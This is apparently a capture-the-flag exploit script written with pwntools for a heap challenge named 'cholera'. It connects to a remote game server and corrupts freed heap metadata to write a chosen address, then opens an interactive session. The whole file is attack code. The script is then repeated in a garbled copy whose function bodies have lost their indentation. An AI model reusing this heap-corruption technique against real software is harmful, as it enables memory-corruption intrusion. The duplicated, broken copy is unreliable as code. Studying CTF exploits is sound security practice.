hkraw/cholera_expl.py

## cholera_expl.py
#!/usr/bin/python3
from pwn import *

libc = ELF('./libc-2.23.so')
####Utils
def alloc(size):
	io.sendlineafter('>> ','1')
	io.sendlineafter('>> ',str(size))

def free(idx):
	io.sendlineafter('>> ','3')
	io.sendlineafter('>> ',str(idx))

def read(idx,data):
	io.sendlineafter('>> ','2')
	io.sendlineafter('>> ',str(idx))
	io.sendlineafter('>> ',data)

####Expl
if __name__ == '__main__':
#	io = process('./cholera_ld',env={'LD_PRELOAD':libc.path})
	io = remote('pwn.game.alcapwnctf.in',11337)

	alloc(0x88)
	alloc(0x88)
	free(0)
	read(0,p64(0x0)+p64(0x601070-0x10))

	alloc(0x88)

	io.interactive()
	#!/usr/bin/python3
	from pwn import *

	libc = ELF('./libc-2.23.so')
	####Utils
	def alloc(size):
	io.sendlineafter('>> ','1')
	io.sendlineafter('>> ',str(size))

	def free(idx):
	io.sendlineafter('>> ','3')
	io.sendlineafter('>> ',str(idx))

	def read(idx,data):
	io.sendlineafter('>> ','2')
	io.sendlineafter('>> ',str(idx))
	io.sendlineafter('>> ',data)

	####Expl
	if __name__ == '__main__':
	# io = process('./cholera_ld',env={'LD_PRELOAD':libc.path})
	io = remote('pwn.game.alcapwnctf.in',11337)

	alloc(0x88)
	alloc(0x88)
	free(0)
	read(0,p64(0x0)+p64(0x601070-0x10))

	alloc(0x88)

	io.interactive()